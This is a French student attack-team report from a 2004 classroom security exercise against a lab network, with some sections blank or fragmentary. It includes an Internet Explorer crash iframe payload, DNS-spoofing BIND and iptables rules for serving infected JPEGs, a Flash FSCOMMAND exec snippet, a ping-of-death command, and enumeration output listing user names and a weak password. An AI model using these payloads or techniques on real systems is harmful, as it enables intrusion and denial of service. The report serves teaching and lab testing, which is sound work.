Securite Des Systemes D'information
Securite Des Systemes D'information
Securite Des Systemes D'information
PROJET SECURITE
Equipe Attaque :
HARDOROCK Rémi
1
I. INTRODUCTION
Scénario d'entreprise type : Candide S.A.
L'activité des groupes gravite autour du système d'information d'une entreprise totalement fictive mais dont
les besoins sont représentatifs de ceux que l'on rencontre habituellement.
Notre groupe est chargé de rechercher toutes les possibilités d'intrusion et de compromission les plus
efficaces et les plus faciles à mettre en oeuvre.
Du point de vue métier, les membres de notre groupe jouent le rôle de consultants en sécurités chargés
d'évaluer la solidité du système d'information défendu. Nous sommes totalement étrangers à la structure de
l'entreprise. Les 2 autres groupes ne sont pas sensés nous communiquer la moindre information. Bien
entendu, les membres du groupe «attaque» ne doivent pas se limiter aux moyens techniques pour collecter
leurs informations.
I.1. But.
Tout ce qui peut nuire au réseau des défenseurs.
On distinguera le déni de service (DOS) qui empêche le système de remplir sa fonction, l'exploit qui permet
un accès au système (local pour augmenter les droits, distant pour pénétrer). Et enfin les opérations de
masquage des tentatives, de la pénétration et de la mise en place de portes dérobées pour récupérer toute
information.
Le déni de service matériel n'est pas envisageable (certains nous reprocheraient des dégradations). Par
contre le plus simple pour récupérer des informations ou implanter des troyens/rotkits/keyloggers/spyware et
autres cochonneries est bien entendu d'avoir un accès physique aux machines. Pour cela il est envisageable
de surveiller l’équipe défense au plus prés afin de pouvoir saisir la moindre opportunité.
Disposer des « softs » précitées afin de pouvoir les introduire à la première occasion.
Le réseau support de l'infrastructure transmet l'information. À ce titre, il est intéressant de réaliser une
écoute passive dessus. On réalise ceci en usurpant une identification de machine réceptrice de l'information.
I.3.2. Moyens.
ARPspoof: technique montrée en cours permettant d'usurper l'identité MAC d'une machine.
DNSspoof: même technique au niveau ip. Réalisé en montant un faux serveur dns pour masquer la
correspondance ip<=>nom d'hôte.
2
I.3.3. Utilitaires.
ethereal
tcpdump
etherape
Les services proposés sur le réseau reposent sur des logiciels. Il existe souvent des failles permettant de
pénétrer dans le système.
On se doit d'identifier les services et les serveurs mis en place (scan et identification). Une fois ceci établi, on
recherche les failles connues (exploit) et l'on tente de les exploiter. Une autre solution est l'analyse du code
si il est disponible ou par reverse-engineering, solutions que nous n'utiliserons sans doute pas faute de
compétences et/ou moyens.
Source d'exploits
http://www.securiteam.com/exploits/
http://www.k-otik.com/exploits/
http://www.hoobie.net/security/exploits/
http://www.securityfocus.com/bid
L'humain parle ! Il va donc s'agir d'être extrêmement attentifs aux informations lâchées par nos collègues
des autres équipes soit en "écoutant aux portes" soit en les faisant parler. Nous ne proposerons pas de
solution trop agressive (torture, chantage, etc...) qui sont néanmoins envisageable dans certains cas réels.
On se bornera ici à la manipulation, le recoupement d'info, la fouille systématique des poubelles après une
réunion d'un des autres groupes (si possible).
I.5.3. Masquage.
Notre activité sera grandement facilitée par l'utilisation de la désinformation de l'adversaire. Il conviendra
donc d'appliquer certaines techniques:
Lâcher de fausses informations sur nos techniques, nos axes de recherche, nos résultats, notre
organisation.
3
Protéger la vérité: mensonge systématique, pour que ceci reste crédible il faudrait s'accorder sur des
mensonges à faire passer de façon que par recoupements ils deviennent crédibles. De même, s'ils venaient
à nous démasquer, casser la confiance qu'ils ont dans les vraies infos.
Noyer les équipes d'audit et de protection sous un déluge d'attaques "bidon" de façon à saturer leur capacité
d'analyse et leur faire croire à un faible niveau de technicité de notre part (encore faut-il que ce ne soit pas la
vérité).
4
II. DISTRIBUTION DES TACHES/ROLES
D'après les résultats des différentes réunions et les discutions que nous avons eu, voila un résumé de notre
fil directeur d'attaque sachant que la suite dépendra de ce que l'on découvrira sur le réseau (activité du lundi
11/10/04)
Attaque Test des mots de passe d'usine pour prendre la main sur les éléments
d'interconnexion
Denis de service
Spoofing, on va essayez de prendre la main sur le routeur
Nettoyage après notre passage (ce n’est pas vraiment une attaque)
Pénétration (attaque netbios)
Outils: uito; arpspoof; dnsspoof; tcpdump; ethereape
5
II.4. Attaques des services.
6
III. SYNTHESE DES ECHEANCIERS
Un tableau de synthèse des échéanciers. Les détails sur chaque point sont donnés en annexe dans nos rapports de réunion. Ils sont indiqués sous chaque date.
Coordination du groupe
04/10/04 Choix d’une méthode de travail Approfondissement des
(cf. rdv1.txt) Etablissement des rendez-vous « réunion » connaissances
Coordination intergroupe
07/10/04 Mise en place du matériel
Approfondissement des connaissances
(cf. rdv2.txt) Mise en place des logiciels
7
Attaque de type dnsspoof qui a marché partiellement. Manque de compétence
Attaque par jpeg infecté. pour attaquer Installation d’une machine dans leur
25/10/04 Solution sur les problèmes liés au trafic manquant sur la Pas d’accès à la maquette réseau.
(cf. rdv4.txt) maquette de l’intérieur Choix du système d’exploitation le
Etudes des failles sur le routeur Problème de coordination plus judicieux à mettre sur ce poste
intergroupe
Problèmes de disponibilité
Attaque FTP par DoS pour l’installation et
Installation et intégration de Morphée sur le réseau de la l’intégration de Morphée
défense Coordination intragroupe : 2
Etude d’attaque avec DSNIFF installation de Morphée Attaques de type Déni de service
Validation de l’accès distant Coordination intergroupe : Attaques diverses
05/11/04 Attaque du routeur avec RAT Morphée n’avait accès à Compte rendu des attaques menées
Scan du réseau interne avec des outils sous windows aucune ressource sur le par chacun
(utilisation d’un portable) réseau (loin de la réalité)
Réinstallation de morphée Problème de l’équipe
Configuration des ressources partagées par Morphée défense sur la configuration
du firewall
8
IV. POLITIQUE DE SECURITE/AUDIT
Au cours de ce projet nous avons travaillé en coordination intergroupe. En effet il a été convenu de travailler
par « pallier » : l’équipe défense prépare sa maquette avec un niveau de sécurité faible (quasi nul) ; ensuite,
il était prévu deux évolutions de la sécurité ; enfin, la défense devait sécurisé au maximum en fonction des
recommandations de l’équipe audit.
D’après le résultat de nos diverses attaques voici les différentes architectures que nous pouvons établir :
Cette première architecture nous a permis de mener les premières attaques mais elle a été modifiée
rapidement par la défense (formatage de la machine cliente).
9
Cette architecture a évolué vers la suivante :
Cette architecture est celle sur laquelle nous avons le plus travaillé. En effet c’est celle qui nous a parue la
plus stable même si l’équipe défense y a régulièrement modifié des éléments.
10
Enfin, voici la dernière architecture issue de nos scans :
Cette dernière architecture a été détectée en fin de projet. Il est à noter qu’elle a pris du temps à être mise
en place par l’équipe défense (notamment pour la mise en place du firewall).
Enfin, les résultats des scans de cette configuration sont les mêmes que l'on scanne de notre machine
(Morphée) à l'intérieur de leur réseau ou de celle à l'extérieur (Attila).
11
V. TACHES ET REALISATIONS
Nous choisirons ici de présenter les taches effectuées de façon chronologique par rapport à l’évolution du
projet :
Date : Le 13/10/2004
Les objectifs particuliers à cette tâche : L'objectif de cette tache est d'avoir un accès total à
la machine et en même temps de rendre impossible
l'accès à la machine au vrais utilisateurs.
Les Résultats
L'objectif a été atteint. En effet en changeant le mot de passe de l'accès distant (vnc) nous avions un accès
total à la machine ce qui à permis de l'utiliser pour mener d'autres attaques.
Bibliographie
12
V.2. Charge logs système et surcharge audit
Date : Première semaine
Les objectifs particuliers à cette tâche : Il s'agit ici de prouver la capacité de noyer l'équipe
audit sous une charge de
logs intraitable manuellement et de démontrer la
capacité de surcharge des logs
systèmes de l'équipe défense.
Les outils & moyens utilisés : Codage d'un outil de génération de bruit http.
Les Résultats
Bibliographie
Protocole http.
13
V.3. Internet explorer DoS (crash)
Date : 14/10/04
Code :
<iframesrc="?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">
Les Résultats
Bibliographie
http://www.wulab.com
14
V.4. Audit Samba
Date : 14/10/2004
Les objectifs particuliers à cette tâche : Analyser les services samba offerts par l'équipe
défense
Les Résultats
Bibliographie
http://packages.debian.org/unstable/admin/smb-nat
15
V.5. Install back Orifice.
Date : 14-15/10/04
Les Résultats
Bibliographie
http://www.wulab.com
16
V.6. Spoofing DNS pour envoyer JPEG infecté.
Date : 20/10/2004
Les objectifs particuliers à cette tâche : Il s'agit de rediriger les requêtes dns venant d'une
machine cible vers notre propre serveur pour lui
transmettre des réponses erronées. Ceci nous
permet de copier un site Internet connu (google) et
remplaçant les images par des images infectées par
la faille jpeg.
Les outils & moyens utilisés : Dans un premier temps nous avons cherché les outils
pour faire cette attaque via un poste windows.
Liste des outils windows: winarp_mim; winpcap;
WinDNSSpoof; apache
--> echec de mise en place pour le DNS spoofing, cela
générait des erreurs windows tout à fait claires...
La mise en place de ces outils n'ayant pas donné de
résultat nous nous sommes tournée vers une solution sur
Debian.
Mise en place d'un serveur DNS (BIND 9) sur attila.
conf:
zone "google.fr" {
type master;
file "/etc/bind/db.google.fr";
};
zone "google.com" {
type master;
file "/etc/bind/db.google.com";
};
etc/bind/db.google.fr:
$TTL 5
@ IN SOA ns.google.fr.
root.google.fr. (
2004102199; serial
5; refresh
5; retry
5; expire
5; default_ttl
)
@ IN NS ns.google.fr.
@ IN MX 100 mail.google.fr.
ns IN A 172.16.80.250
mail IN A 172.16.80.250
www IN A 172.16.80.250
IN A 172.16.80.250
17
attila:/tmp# iptables -t nat -A PREROUTING -p tcp --
dport 53 -j DNAT --to-destination 172.16.80.250:53
attila:/tmp# iptables -t nat -A PREROUTING -p udp -
-dport 53 -j DNAT --to-destination 172.16.80.250:53
Les Résultats
Moyens, le fake dns marche parfaitement sur notre machine de test (hackzone).
Mais il semblerait que les machines du groupe défense ne sachent pas faire une requête dns correcte
(ajout de .défense systématique relevé à l'ethereal).
Concernant les failles jpeg, nous n'avons pas pu les tester sur notre machine de test celle ci ayant le
correctif installé.
Bibliographie
http://www.securiteinfo.com/outils/WinDNSSpoof.shtml
http://winpcap.polito.it/
http://www.chez.com/keep/KoM/dns.htm
18
V.7. Scans de machine
Date : Le 25/10/04
Les objectifs particuliers à cette tâche : Ce scan vise à mettre en évidence les failles de
sécurité sur les matériels informatique qui ont été
trouvé lors de la cartographie du réseau (par
Cheops par exemple).
Position dans l'échéancier : Dans un cas réel, ce scan est la deuxième des
phases à effectuer (après la cartographie du réseau)
pour découvrir une proie sur un réseau et voir aussi
de façon détaillée les failles sur cette proie. Sur
notre maquette, nous avons dû régulièrement faire
des scan car l'architecture du réseau de l'équipe
défense à régulièrement changé.
Les outils & moyens utilisés : Pour effectuer cette "attaque", j'ai utilisé l'outil
Nessus.
Nessus est un scanner de vulnérabilité qui effectue
un balayage réseau sur une cible pour chercher des
vulnérabilités dans le réseau, comme des erreurs de
programmation, des backdoors, etc...
Nessus fonctionne grâce à un système de client et
de serveur. Le serveur peut fonctionner sur la plate-
forme Unix, y compris Linux et OpenBSD, tandis
que le client peut fonctionner sur divers systèmes
d’exploitation, par exemple, Windows.
Il est très utile lors de tests de pénétration (pen test)
et fait gagner un temps incroyable.
Les Résultats
Voici un extrait du rapport généré par Nessus; Ici j'ai demandé à Nessus de me faire un compte rendu avec
les failles de sécurité qui sont les plus graves.
Scanned hosts:
19
Service: ftp (21/tcp)
Severity: High
Vulnerable hosts:
172.66.66.5
--------------------------------------------------------------------------
Vulnerable hosts:
172.66.66.5
--------------------------------------------------------------------------
This particular check sent a malformed HTML authorization packet and determined that
the remote host is not patched.
Solution : http://www.microsoft.com/technet/security/bulletin/ms04-007.mspx
Risk factor : High
CVE : CAN-2003-0818
BID : 9633, 9635, 9743
Other references : IAVA:2004-A-0001
Vulnerable hosts:
172.66.66.5
-------------------------------------------------------------------------
Les rapports entiers de Nessus sur les machines 172.66.66.5 et 172.66.66.6 sont donnés en annexe.
Bibliographie
20
V.8. Scans du routeur
Date : 25/10/2004
Les objectifs particuliers à cette tâche : Il s'agit de trouver des failles exploitables au niveau
de la configuration du routeur.
Les outils & moyens utilisés : Utilisation de l'outil d'audit RAT (Routeur Audit Tool)
de Cisco pour obtenir un état des lieux.
Apres installation :
% rat --snarf 172.16.80.2
Les Résultats
Fichiers listant les erreurs commises à la configuration du routeur qui pourraient être exploitable.
Voir annexes RAT pour les résultats
Bibliographie
http://www.cisecurity.org/bench_cisco.html
21
V.9. Accès en lecture à des informations système
Date : Le 25/10/04
Les objectifs particuliers à cette tâche : L'objectif est d'avoir des informations sur le système
distant en vue d'exploiter les résultats pour mener
d'autres attaques.
Les outils & moyens utilisés : Nessus pour trouver la faille. Scan des ports 1 à
1024 de la machine 172.66.66.5. Mise en
évidence de la faille sur le port 161 en UDP.
WS_Ping ProPack pour exploiter la faille.
Utilisation de l’outil SNMP du logiciel pour
parcourir la MIB.
Les Résultats
Bibliographie
22
V.10. Mail Bombing.
Date : Le 26/10/04
Les Résultats
Visiblement l'attaque n'a pas marché car l'équipe défense n'a pas reçu le mail bombing. POurtant elle a
bien reçu le mail de test (en
telnet). Je pense que l'outil est défectueux.
Bibliographie
23
V.11. Attaque FTP bounce,
Date : Le 27/10/2004
Les objectifs particuliers à cette tâche : Obtention des droits d'administrateur sur le serveur
ftp de l'équipe défense
Les outils & moyens utilisés : Aucun outil nécessaire, il s'agit de vérifier si la
configuration du serveur ftp ne comporte pas une
faille pour l'obtention des droits.
Il suffit de se loguer à partir d'une console sur le
serveur ftp.
Ex :
ftp>open www.lame-org.com
Connected to www.lame-org.com
220 websrv 1 Microsoft FTP Service (version 4.0)
ftp>quote user ftp
331 Anonymous acced allowed, send indentify as
password.
ftp>quote cwd~root
530 Please login with USER and PASS.
ftp>quote pass ftp
230 Anonymous user logged in. ou 530 user ftp
cannot log in.
Les Résultats
En fait, on est directement logger en compte anonyme qui a tous les droits d'accès
Exploitation possible :
Réaliser une attaque de type DoS en surchargeant leur disque dur avec de gros fichiers
(Multiples dossiers contenant chacun les sources d'une distribution debian :) )
=> cela permet également de faire du bruit pour l'équipe analyse
en faisant plusieurs ‘put ‘ sur leur serveur ftp, nous sommes arrivée a une utilisation de ~70% de la BP
Bilan après écoute auprès des équipes analyse et défense :
Aucune remontée de l'équipe analyse qui souffrait a ce moment d'un problème de port miroring
L’équipe défense en s'est aperçu qu'après un long moment car il ne devait pas observer leur machine.
Bibliographie
http://jeanclaude.guyot.free.fr/
http://www.blocus-zone.com
24
V.12. Attaque FS COMMAND Flash.
Date : 29/10/04
Les objectifs particuliers à cette tâche : Exécuter un fichier sur un poste client.
On Realease {
FSCOMMAND("exec","C:/Windows/system/Run32dll...")
}
Les Résultats
Bibliographie
25
V.13. Attaque routeur
Date : 03/11/2004
Les objectifs particuliers à cette tâche : Il s'agit de réussir a prendre la main sur le routeur
afin d'en modifier les règles ou
Tout simplement de faire tomber celui-ci.
Les outils & moyens utilisés : Utilisation du rapport obtenu à l'aide de l'outil RAT
Utilisation d'un programme : Cisco global exploiter,
permettant d'effectuer diverses attaques spécifiques
aux équipements cisco.
Utilisation d'autre programmes spécifiques à
l'attaque d'équipements Cisco tel shadowchode.
Ces programmes sont des scripts Perl ou bash
nécessitant seulement de rentrer quelques
informations tel que l'adresse IP de l'équipement
visé.
Les Résultats
Pas de résultats positifs, les attaques étant généralement bien spécifique à un type d'équipement ou à une
certaine version d'IOS, qui ne correspondaient pas à l'équipement de la maquette défense.
J'ai recensé d’autres types d'attaques sur les équipements Cisco mais qui demandaient vraiment un travail
important que je n’ai pu mettre en oeuvre, manque de temps.
Bibliographie
http://www.cisecurity.org/bench_cisco.html
http://www.k-otik.com/exploits/
http://www.antiserver.it/Cisco-Exploit/
http://www.phenoelit.de
26
V.14. Test d'attaques DOS
Date : 03/11/2004
Les Résultats
Bibliographie
http://packetstormsecurity.org/DoS/
27
V.15. NetBios / FTP / Services Web.
Date : 08/11/2004
Les outils & moyens utilisés : Outil clé en main sur Windows NTIS422.exe durant
la séance de TP sur leur serveur WEB
Les Résultats
############## Netbios:
Share Information
Share Name :DR-JEKIL.LOG
Share Type :Disk
Comment :Journaux de suivi de messages Exchange
WARNING - Null session can be established to \\172.44.44.1\DR-JEKIL.LOG
Share Name :IPC$
Share Type :Default Pipe Share
Comment :IPC distant
WARNING - Null session can be established to \\172.44.44.1\IPC$
Share Name :D$
Share Type :Default Disk Share
Comment :Partage par défaut
Account Information
Account Name :Administrateur
The Administrateur account is an ADMINISTRATOR, and the password was
changed 34 days ago. This account has been used 127 times to logon.
This account is the renamed original default Administrator account.
28
changed 0 days ago. This account has been used 0 times to logon.
Comment :Ce compte utilisateur est utilisé par les services Terminal Server.
User Comment :
Full name :TsInternetUser
Comment :Compte intégré pour des services Internet (IIS) afin de démarrer les applications
hors processus
User Comment :Compte intégré pour des services Internet (IIS) afin de démarrer les applications
hors processus
Full name :Démarrer le compte de l'invité Internet
Comment :
User Comment :
Full name :SystemMailbox{79BC35CC-BE7C-438A-A03F-4D49A1ED7AF2}
Comment :
User Comment :
Full name :Mathieu Demblans
Comment :
User Comment :
Full name :Benjamin Guillot
Comment :
User Comment :
Full name :Alexandre Goffard
29
The nicolas.audureau account is a normal USER, and the password was
changed 33 days ago. This account has been used 3 times to logon.
Comment :
User Comment :
Full name :Nicolas Audureau
Comment :
User Comment :
Full name :Mathieu Begue
Comment :
User Comment :
Full name :Charles-Henry Gidel
Comment :
User Comment :
Full name :Cathy Noiret
Comment :
User Comment :
Full name :stri
############## FTP:
Microsoft FTP Service (Version 5.0).
Security Issues
Anonymous logins are allowed to the ftp service.
Service allows ftp bounce attack to ports greater than 1024.
Anonymous uploads allowed to root directory.
Bilan:
L'outil à réaliser correctement son travail, nous avons pu entre autre confirmer que le serveur FTP accepte
les connexions anonyme avec un droit d'écriture.
Plus intéressant nous avons récupéré tous les noms d'utilisateurs et mis à jour qu'un utilisateur a pour nom
stri et pour mot de passe stri. Nous pouvons donc en déduire toutes leurs adresses mail et lancer
une connexion sur la machine.
Pas de résultats exploitables concernant les web services.
Bibliographie
http://packetstormsecurity.org/
30
V.16. Attaque macof + dsniff.
Date : 8/11/04
Les objectifs particuliers à cette tâche : tenter de saturer le switch auquel est relié morphee
afin que celui ci se comporte comme un hub.
Les outils & moyens utilisés : dsniff v2.4b1-7 et macof qui fait partie du package
dsniff
Les Résultats
échec. Le switch ne semble pas réagir à l'attaque et l'écoute ne donne aucuns résultats (voir le fichier
res.log sur morphee)
Bibliographie
http://www.groar.org/trad/dsniff/english.shtml
31
V.17. Deni de service avec ping
Date : 09/11/04
Les objectifs particuliers à cette tâche : L'objectif est d'obtenir un déni de service en utilisant
la commande ping
Position dans l'échéancier : Cette tache vient a la fin de l'échéancier pour rendre
les machines de la société Candide SA inaccessible.
Les outils & moyens utilisés : Cette attaque peut servir a faire crasher certains
OS. Selon les traitements effectués par la pile
TCP/IP de l'OS, au moment du réassemblage, il
calcule une taille négative pour le second fragment.
Cette valeur est passée a une fonction qui fait une
copie depuis la mémoire... mais la mémoire ne gère
pas de nombres négatifs et croit en fait a un tr es
grand positif . . . le résultat est immédiat.
Un second type d'attaque utilisant des fragments
s'appelle TFA (Tiny Fragment Attack). Elle
ressemble beaucoup à la précédente. On crée deux
fragments TCP, le premier est tellement petit qu'il ne
contient pas l'en-tête TCP entière, surtout le numéro
de port destination, le second contient donc la fin de
ce header (avec le port dest). Certains firewalls
laissent passer ce genre de paquets. Mais ce n'est
plus du tout la majorité.
Un autre type d'attaque consiste à envoyer des
paquets fragmentés anormalement grand. Chaque
fragment ne dépasse pas la taille maximale mais le
paquet reassemblé la dépasse. Ceci permettait de
faire planter pas mal de machines
(95/98,NT3.51,MacOS 9,Linux 2.0.x,Solaris pour
x86 et bien d'autres) . Cette attaque commence a
etre un peu vieille mais il reste beaucoup de ces
syst emes présents sur le net . . . Pour NT 3.51 c'est
très simple : ping -l 65510 -s 1 ip.de.la.victime
Les Résultats
Je n'ai pas pu testé cette attaque car elle demande un temps de préparation assez important de
compréhension. En effet le texte parait simple mais la mise en œuvre avec ping ou hping2 est plus difficile.
Bibliographie
Détail du le ping :
http://www.supinfo-projects.com/en/2003/restrictions_trafic_linux/2.5/
man de hping2 :
http://www.groar.org/trad/hping/hping2-beta54/french/hping2-fr.8.txt
Dans le cas où un travail n'a pas donné lieu à une exploitation sur la maquette, on précisera pourquoi et
surtout quelles sont les préconisations pour qu'une exploitation puisse avoir lieu.
32
V.18. Test d'attaques DOS – 2
Date : 18-19/11/2004
Les Résultats
Difficultés d'utilisation de cet outil qui fait planter à intervalles régulier notre machine.
La machine 172.88.88.200 semble avoir subit cette attaque.
Le Test sur la machine 172.44.44.1 n'a rien donnée.
Bilan:
Même qu'a la première attaque DOS menée
Les outils mis à disposition de type clés en main ne sont pas forcément adaptés
à l'architecture utilisée. Ils sont donc destinés à une utilisation bien particulière.
Bibliographie
http://packetstormsecurity.org/DoS/
33
VI. BILAN
Une partie bilan avec :
Une synthèse sur l'ensemble du projet présentant les points positifs et négatifs ainsi que des préconisations
pour l'améliorer. Toutes les propositions sont les bienvenues !
VI.2. Le TP en lui-même
C’est ici que les nombreuses contraintes ont été rencontrées tant au niveau de la maquette en elle-même
qu’au niveau de son accès.
Tout d’abord, nous n’avons pas dans notre planning scolaire beaucoup de temps spécifique pour ce TP mais
seulement 1h30 le lundi matin.
D’autre part, la maquette reflète peu la vie réelle au niveau de l’activité des machines, au niveau de la
vulnérabilité humaine et celles des ressources.
Ensuite, les accès distants limitent certaines de nos attaques à cause du problème de débit.
Enfin, notre incompétence pratique dans ce domaine nous oblige à utiliser beaucoup de temps à
l’apprentissage de méthode d’attaque.
Cependant il y a des aspects positifs liés au fait que l’on apprend à attaquer en utilisant les vrais outils de
hacker. Nous apprenons par la même occasion à sécuriser des systèmes en connaissant leurs
vulnérabilités.
Enfin nous avons tous compris maintenant que les hacker sont des programmeurs car la programmation est
la base de toute tentative d’action dans ce domaine.
VI.3. Conclusion
Cet exercice devrait être effectué les années à venir en lui allouant beaucoup plus d’heure et en optimisant
la maquette générale (défense audit et attaque).
Les outils mis à disposition de type clés en main ne sont pas forcément adaptés à l'architecture utilisée. Ils
sont donc destinés à une utilisation bien particulière.
34
VII. DEFINITIONS.
Voici les quelques définitions que nous avons rencontrées lors de nos recherches d’attaques :
Bluebox Moyen technique pour pirater les télécom. Utilise des fréquences
numériques afin de détourner les commutateurs téléphoniques et donc ne
pas payer les communications.
Bombes Logicielles Se sont des morceaux de code dans les programmes qui entrent en
action à une date précise ou à la suite d'un ordre extérieur
Bug overflow Phénomène se produisant lorsque le tampon (buffer) ne peut pas traiter
correctement toutes les données qu'il reçoit. Cela arrive quand le taux de
transfert de données du destinataire est trop inférieur à celui de
l'expéditeur. Un buffer Overflow entraîne très souvent un crash du
système cible ou permet d'en prendre le contrôle. C'est pourquoi il est
régulièrement utilisé volontairement par les pirates.
35
Cyberwoozle Dispositif visant à récupérer des informations sur une entreprise en se
(Siphonnage des servant des paramètres fournis par les navigateurs internet.
données) :
Denis de service consiste à paralyser temporairement (rendre indisponible pendant un
temps donné) des serveurs afin qu'ils ne puissent être utilisés et
consultés.
Lamer Il s'agit alors de pirates qui n'ont généralement presque aucun savoir
dans le domaine du hacking, mais se pavanent en réalisant des exploits
très faciles à reproduire. Aux yeux des hackers véritables, ils sont des «
rigolos » ou des amateurs un peu vantard.
36
Nuke Action qui consiste à faire déconnecter illégalement un usager. Pour y
arriver, il y a plusieurs moyens dont notamment surcharger de données
l'usager en passant par ses ports.
Polymorphe Se dit d'un virus modifiant sa forme (signature, longueur, code, etc.) au
cours de son existence, pour déjouer les recherches des antivirus.
Difficiles à repérer pour les antivirus se basant uniquement sur des bases
de données de signature (même régulièrement mises à jour), les virus
polymorphes sont souvent dangereux.
rootkits Il s'agit d'un paquetage logiciel mis au point par un pirate pour prendre le
contrôle d'une machine (généralement Unix, d'ou la référence au super
utilisateur "root") à l'insu de son administrateur. Souvent installé par un
"cheval de Troie", les rootkits combinent plusieurs actions, telle que:
Remplacement de binaires (ex.: /bin/login, /sbin/ifconfig, /bin/netstat),
installation de "passwords sniffer", activation d'outils de nettoyage des
fichiers log, modification d'autorisations (ex.: décommenter certains
fichiers de configuration) et la liste n'est pas exhaustive!
Sniffing Écouter une ligne par laquelle transitent des paquets de données pour
récupérer à la volée les paquets qui peuvent être intéressants
37
Social engineering contactant directement certains utilisateurs du réseau (par mail ou par
téléphone) afin de leur soutirer des informations concernant leur
identifiant de connexion et leur mot de passe. Ceci est généralement fait
en se faisant passer pour l'administrateur réseau.
Troyen infection de l’ordinateur qui se met à travailler tout seul (le disque n'arrête
pas de gratter, des applications se lancent toutes seules…) et qui peut
être contrôlé par une autre personne via internet : intrusion du "socket de
Troie
38
saturant les ressources de la machine.
39
VIII. ANNEXES (FICHIERS JOINTS).
planAction.txt
Rdv1.txt
Rdv2.txt
Plan_d_attaque_11_10_04.txt
Rdv3.txt
Rdv4.txt
Rdv5.txt
Rdv6.txt
Annexes Rat
Annexes NMAP
nessus_172_66_66_6_failles.txt
nessus_172_66_66_5_failles.txt
40